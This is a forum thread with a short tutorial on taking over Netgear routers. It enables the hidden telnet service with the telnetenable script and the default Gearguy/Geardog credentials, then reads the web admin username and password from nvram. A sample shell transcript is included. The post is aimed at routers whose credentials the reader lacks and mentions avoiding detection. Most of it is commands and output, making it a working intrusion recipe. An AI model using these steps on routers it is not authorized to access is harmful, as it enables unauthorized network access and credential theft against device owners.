Howto Pwn Netgear Routers via Telnet

Discussion in 'eBooks, PDFs, Videos & MP3s' started by scorpius, 16 Sep 2012.

  1. scorpius

    scorpius Well-Known Member

    Joined:
    12 Jul 2012
    Messages:
    32
    Likes Received:
    22
    One can access a Netgear router's configuration page with a browser and the default admin-password login combination. When this information is not available, the router can be reset with a paperclip, but all settings will be lost, and you risk being detected. A better solution is to use telnet.

    Most Netgear routers have the telnet service up and running. Even though it is disabled by default, it can be remotely enabled as long as you are connected to the AP. Download the python script (Please login or register with a valid email address to view links / downloads) and execute it as follows, making sure to substitute the router's local IP address, and to enter the router's mac address in all capital letters:

    python telnetenable.py 192.168.1.1 MACADDRESS Gearguy Geardog

    Now you can telnet into the router (with this command: telnet 192.168.1.1) and do all kinds of neat things. Below is the output for a WNR1000v3. As you can see, the router is running busybox. The routerinfo command gives a quick overview and also displays the WPS pin. Not all models have the routerinfo command. In that case, press tab to see a list of installed commands, or type busybox.

    The nvram command allows you to access (and perhaps change) all the settings that are stored in the device's non-volatile memory. Some models use config instead of nvram, but it does the same thing. In order to fully pwn a router, for which you do not have the login credentials, you can use the nvram get http_ commands as shown below. That's how you can quickly get the name and password for the web interface

    Code:
    Select All
    Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is '^]'. BusyBox v0.60.0 (2010.12.01-12:13+0000) Built-in shell (msh) Enter 'help' for a list of built-in commands. # routerinfo Release version : Netgear Wireless Router WNR1000v3 U12H13900/V1.0.2.28/52.0.60NA Time : Dec 1 2010 20:19:46 CFE version : 3.0.6 WSC PIN - XXXXXXXX LAN mac address - 204E7FXXXXXX WAN mac address - 204E7FXXXXXX WLAN mac address - 204E7FXXXXXX Board ID - U12H139T50_NETGEAR serial number - XXXXXXXXXXXXX # nvram get http_username XXXXXXXX # nvram get http_passwd XXXXXXXX
    The nvram show command shows all variables, including hidden ones that are not available on the web interface. The ls -l command shows you all the files on the router, which is nothing but a small computer. Don't forget to look inside the www directory for hidden pages. Have fun exploring the inner workings of your router.
     
  2. Inkwizytor666

    Inkwizytor666 Member

    Joined:
    27 Jan 2013
    Messages:
    1
    Likes Received:
    0
    Where can I download this python file?
     
  3. scorpius

    scorpius Well-Known Member

    Joined:
    12 Jul 2012
    Messages:
    32
    Likes Received:
    22
    It comes with backtrack, and also at: code.google.com/p/netgear-telnetenable/
     
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K